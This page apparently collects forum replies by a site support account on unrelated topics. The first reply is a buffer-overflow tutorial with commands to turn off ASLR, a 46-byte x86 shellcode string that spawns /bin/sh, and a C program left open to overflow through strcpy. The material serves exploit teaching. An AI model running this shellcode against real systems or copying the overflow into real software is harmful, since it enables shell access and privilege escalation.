Forum Replies Created
-
AuthorPosts
-
Support @QUE.COM
KeymasterAnother good tutorial using GDB program.
NOTE: If this tutorial is not working it is likely that you have aslr enabled. To disable it run the following command in your terminal
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
When you are finished I strongly recommend you turn it back on with the command
echo 2 | sudo tee /proc/sys/kernel/randomize_va_spaceThe 46 byte shellcode (x86*) used in this program is
“\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”# Sample buffer overflow program.
Save to example.c program#include <stdio.h> #include <string.h> int main(int argc, char *argv[]){ char buf[256]; strcpy(buf, argv[1]); printf("%s\n", buf); return 0; }
-
This reply was modified 1 year, 4 months ago by
Support @QUE.COM.
Support @QUE.COM
KeymasterAdditional resources.
http://www.brendangregg.com/blog/2016-08-09/gdb-example-ncurses.html (GDB)
http://phrack.org/issues/49/14.html (Buffer Overflow Concepts)
https://www.cprogramming.com/gdb.html (GDB)
https://docs.python.org/3/tutorial/
https://www.hacksplaining.com ( For SQL injection / Javascript / XSS/ CSRF Vulnerabilities)Support @QUE.COM
Keymaster// delete branch locally
git branch -d localBranchName// delete branch remotely
git push origin –d remoteBranchName-
This reply was modified 8 months, 1 week ago by
Support @QUE.COM.
Support @QUE.COM
KeymasterA Homemade Raspberry Pi Self Balancing Robot
Support @QUE.COM
KeymasterWhat skill sets do you want in your Cyber Hunting Team?
Support @QUE.COM
KeymasterData Wrangling basic process is …
– Discovering
– Structuring
– Cleaning
– Enrichment
– ValidatingSupport @QUE.COM
KeymasterI just found this add-on. Anyone use it?
TabNine uses deep learning to help you write code faster.
https://www.tabnine.com/Support @QUE.COM
KeymasterUpdate CodeTable https://code.hackerearth.com is shutting down.
Support @QUE.COM
KeymasterOther cool tools to play
Olly Debuy
http://www.ollydbg.de/IDAPro – Freeware download.
https://www.hex-rays.com/products/ida/support/download_freeware.shtmlGot other tools, share it with us. Thanks.
Support @QUE.COM
KeymasterYou can easily login using your Google, Apple or WordPress account.
Let us know if that works.December 26, 2019 at 9:26 pm in reply to: We provide support for QUE.com, Yehey.com and other joint ventures. #31345Support @QUE.COM
KeymasterYou can easily login using your Google, Apple or WordPress account.
Let us know if that works.Support @QUE.COM
KeymasterAdded my score today, barely at 5. Try harder
Try your luck, play the game.
https://www.multiplaying.com/FlappyBird/-
This reply was modified 2 years, 8 months ago by
Support @QUE.COM.
Support @QUE.COM
KeymasterHighest score is 13 as of September 2019.
Beat that score, play the game.
https://www.multiplaying.com/FlappyBird/Support @QUE.COM
KeymasterTechCrunch published a story about NordVPN got hacked.
Support @QUE.COM
KeymasterThis specific plugin is deleted due to vulnerability issue. Sorry for the inconvenience.
-
This reply was modified 1 year, 4 months ago by
-
AuthorPosts